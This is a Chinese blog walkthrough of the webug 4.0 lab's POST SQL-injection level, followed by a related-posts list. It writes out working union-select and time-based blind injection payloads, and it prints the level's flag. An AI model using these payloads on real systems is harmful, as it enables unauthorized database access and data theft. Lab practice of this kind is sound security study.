webug4.0-post注入

最新推荐文章于 2022-11-01 15:07:58 发布
最新推荐文章于 2022-11-01 15:07:58 发布
阅读量1.1k 收藏 3
点赞数 1
分类专栏: 靶场练习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nex1less/article/details/100009033
版权

0x01 漏洞发现

 1.首先在               http://192.168.72.136/control/sqlinject/post_injection.php            页面中输入 1,发现url没有变化,我们初步猜测可能是请求类型可能是post类型。火狐浏览器按f12 查看,或者右键审查元素 也可以,点击左上角方框,然后移动到输入框,发现果然是post类型。

2.在输入框输入 1' 发现报错,然后在输入框输入 1' # 发现页面正常返回,说明页面可能存在注入点。

0x02 漏洞利用

1.既然他报错,那么我们就利用他报错这个特点先来探测出他列数,就用我在显错注入说到的 union方法

1' union select 1 #页面报错
1' union select 1,2 #页面正常
1' union select 1,2,3 #页面报错

 说明列数为2

2.我们探测到列数为2,我们抱着侥幸心理尝试使用      1' union select 1,user() #     看页面是否有回显,发现没有,那么只能通过盲注了。

3.使用bool型盲注尝试:1' and 1=1 #        1' and 1=2 #   发现页面无论与上的对象是对是错页面都没有变化。

4.使用时间盲注尝试:and sleep(3) # 我提交之后可能是我电脑原因 确实延时了,后来想想好像搜索其他参数也有延时。。 后来用 and sleep(20) # 发现还是延时一会就打开。

5.按理说他确实存在注入为啥and不好用呢,我猜测可能二者之间(查询语句和注入语句)可能有一个为假,查询不出来。我用or试了一下      1' or sleep(5) #              1' or sleep(20) # 发现确实延时,可以使用延时注入进行爆破了。

6.

输入输出
1' or if(length(database())>4,sleep(3),1) #延时3秒
1' or if(length(database())>10,sleep(3),1) #立即刷新
1' or if(length(database())>7,sleep(3),1) #立即刷新
1' or if(length(database())=5,sleep(3),1) #延时3秒

判断出数据库长度为5

7. 后续操作请看 我的这篇文章。

注意把文章中的 and 改成 or 即可。

8.最后放出flag(注意flag不在flag表中):  

dsfasdczxcg

0x03 结语

                                          很简单,只要掌握了延时注入 其实post和get没啥区别 就是输入的地方改变

nex1less
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
LS-PREPOST 4.0-X64
12-10
LS-PREPOST,LS-DYNA的前后处理器最新版本,适合windows 64Bit
webug--post注入
gclome的博客
06-03 990
今天来到了post注入 首先我们要明确两个问题 什么是post注入 post注入是通过对输入框进行传参,可以被带入数据库进行的查询 什么条件下可以进行post注入 1.用户可以控制传参; 2.用户输入的语句被带入数据库进行查询。 ok,开始今天的练习题: 访问靶场: 这次页面和前几关不同,明显可见有输入框。 寻找注入点 在输入框尝试1234,英文都没有反应 这时候我们猜测是不是搜索到了结果但是不显示,这样的话就需要特殊字符来让页面产生变化,比如报错页面之类的 输入1’,报错了,找到了注入点 找到注入点后尝试
Webug4.0靶场通关笔记(第二天)--------延时注入post注入
Yasso的博客
02-20 774
一、延时注入 延时注入是基于布尔注入的, 简单来说, 是通过if语句返回的真(true)或假(false)来确定是否执行网页延迟响应,当布尔注入不成功时,即不能直接观察页面的返回正常与否来判断sql语句是否执行成功, 我们这时候就可以采用延迟注入。 1.先判断字段数 2.判断数据库(webug) ?id=1’ and if(substr(database(),1,1)=‘w’,1,sleep(5))%23 (判断数据库第一个字母是否为w,是的话页面正常,否则沉睡5秒) ?
webug 4.0 第四关 POST注入
ONS_cukuyo的博客
04-19 2170
感谢webug团队一直以来的更新维护! webug是什么 WeBug名称定义为“我们的漏洞”靶场环境基础环境是基于PHP/mysql制作搭建而成,中级环境与高级环境分别都是由互联网漏洞事件而收集的漏洞存在的操作环境。部分漏洞是基于Windows操作系统的漏洞所以将WeBug的web环境都装在了一个纯净版的Windows 2003的虚拟机中。 Webug官网:http://www.webug.org...
webug4.0—post注入
Stephen Wolf
01-10 557
post注入是通过对输入框进行传参,可以被带入数据库进行的查询 注入的两个条件: 1.用户可以控制传参; 2.用户输入的语句被带入数据库进行查询。 一、开始注入 首先输入其他,如1,2,3、英文等页面都无变化 这时候我们猜测是不是搜索到了结果但是不显示,这样的话就需要特殊字符来让页面产生变化,比如报错页面之类的 搜索输入右括号) 页面无变化 搜索输入双引号" 页面无变化 搜索输入...
webug4.0——注入
A_dmin的博客
09-09 2605
webug4.0——注入篇 今天接触到一个好玩的靶场环境~~ webug 就去下载安装玩了一下,网盘速度是真的慢,下载下一个下午!!! 附上下载链接:(内附安装教程) 链接: https://pan.baidu.com/s/1WlKzFXsNkfkzzCUR_PYtfA 提取码: jcaa 装好环境,在本地打开,界面还是不错的~ 直接开耍!!! 第一关看题目意思就知道是注入,还是报错注...
ANSYS CFD-Post Users Guide.pdf
11-05
ANSYS CFD-Post Users Guide.pdf
WCF4.0–-RESTfulWCFServices
02-25
WCF很好的支持了REST的开发,而RESTful的服务通常是架构层面上的...WCF中通过WebGetAttribute、WebInvokeAttribute(GET/PUT/POST/DELETE)、UriTemplate定义REST的服务的调用方式,通过WebMessageFormat(Xml/Json)定义消
CFD-POST导出数据方法.pdf
08-25
从CFD-Post导出数据的方法,包括导出一个点的数据和导出点云的数据,因为有时候在模拟的过程中,需要一个平面的速度、压力、温度分布情况,可以在平面上按照某个规律取n个点,得到各点的数值。
ANSYS CFD-Post Tutorials.pdf
07-25
ANSYS CFD-Post官方例子讲义,详细讲解了ANSYS CFD后处理的操作步骤和方法,是学习CFD-Post的必备资料。
webug4.0-过滤注入
nex1less的博客
08-27 681
0x01 漏洞发现 1.首先在 http://192.168.72.136/control/sqlinject/post_injection.php 页面中输入 1,发现url没有变化,我们初步猜测可能是请求类型可能是post类型。火狐浏览器按f12 查看,或者右键审查元素 也可以,点击左上角方框,然后移动到输入框,发现果然是post类型。...
webug4.0注入篇1-8
Xor0ne
06-14 1099
1、显错注入 shot 0、查找闭合方式 数字型:?id=1 正常 单引号: ?id=1' 报错, 双引号: ?id=1” 正常 括号: ?id=1) 正常 综上,可知闭合方式为单引号闭合。单引号报错如下: 1、查询数据库 ?id=1' union select 1,group_concat(schema_name) from information_schema.schemata %23 前三个是mysql自带的,我们只需要注意后面的几个就可以了。 2、确认当前的数据库。 ?id=1' union
webug4.0宽字节注入-6
weixin_34324081的博客
03-17 208
0x00  前言 GBK是一种多字符编码,一个汉字占2个字节,utf-8编码的汉字占3个字节。 addslashes() 函数会对括号里 (') 、(")、 (\)、 (NULL)、的四个字符添加反斜杠并将其返回。 Mysql有一个特性,在进行GBK编码时会将两个字符认为一个汉字(前提是第一个字符的ASCII大于128才能达到汉字范围)。 如果SQL输入经过了addslashes() 函...
特别详细的POST 注入 思路
qq_42097777的博客
04-08 1万+
post注入是通过对输入框进行传参,可以被带入数据库进行的查询 # 注入的两个条件:1.用户可以控制传参,2.用户输入的语句被带入数据库进行查询 1.查询是否有注入点 对输入框填入一些闭合的符号,看页面是否异常 例如: ’        "          ') &...
webug4.0之sql注入
yy
04-23 5047
目录 一. 显错注入 二. 布尔盲注 三. 延时注入 四. post注入 五.过滤注入 一. 显错注入 1. 页面观察 输入id=1和id=2页面,页面显示不同,所以可以判断此变化的地方与数据库有交互,如果存在sql注入我们可以使用联合(显示)注入 2. 判断是否存在注入漏洞 输入id=1',显示错误,说我们的语法不正确。且显示出了数据库查询语句,可以知道为字符型注入,且字符为单引号。所以注入点就是加单引号就行 3. 使用联合注入 (1) 判断当前表的字段个数 id=1.
Webug4.0靶场过关--注入
BGiscool的博客
11-01 1225
webug靶场过关秘籍
webug 4.0 第三关 延迟注入
ONS_cukuyo的博客
02-28 1866
感谢webug团队一直以来的更新维护! webug是什么 WeBug名称定义为“我们的漏洞”靶场环境基础环境是基于PHP/mysql制作搭建而成,中级环境与高级环境分别都是由互联网漏洞事件而收集的漏洞存在的操作环境。部分漏洞是基于Windows操作系统的漏洞所以将WeBug的web环境都装在了一个纯净版的Windows 2003的虚拟机中。 Webug官网:http://www.web...
sql注入之GET/POST注入
热门推荐
qq_38135094的博客
04-02 1万+
针对不同数据库,语句有所不同,但是思路大致相同 第一步判断网站是否存在注入, 如 www.xxx.com/news.php?id=10 这个网址,使用and 1=1,and 1=2 判断是否存在注入 还需要判断数据库类型,在网址后面加上单引号,看报错情况,如果显示Microsoft JET Database错误,则是Access数据库,如果显示ODBC类型,则是MSSQL数据库 另
webug4.0靶场之越权查看admin
0nc3的博客
06-26 947
0x00 准备工作 将/control/auth_cross/email.php文件的第16行改为以下代码 0x01 测试过程 从关我们知道了有两个账户,既然是越权查看admin,那我们就用aaaaa账户登录后台管理系统 登录成功后页面如下 既然是查看admin,将id改为1即可实现 so easy~ ...
CFD-post注册表失效
最新发布
12-04
CFD-post是ANSYS Fluent的后处理工具,如果注册表失效,可能会导致无法正常使用该工具。以下是解决CFD-post注册表失效的步骤: 1. 打开Windows注册表编辑器,方法是按下Win+R键,输入regedit,然后按下回车键。 2. 导航到以下路径:HKEY_CURRENT_USER\Software\ANSYS Inc.\CFD-Post\2021R1\CFD-Post\Preferences 3. 在右侧窗格中找到License Server项,双击它并将其值更改为正确的许可证服务器地址。 4. 如果License Server项不存在,请右键单击Preferences文件夹,选择新建>字符串值,将其命名为License Server,然后将其值设置为正确的许可证服务器地址。 5. 关闭注册表编辑器并重新启动CFD-post。 如果以上步骤无法解决问题,请确保您的许可证文件仍然有效,并且您的许可证服务器正在运行。如果问题仍然存在,请联系ANSYS技术支持。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值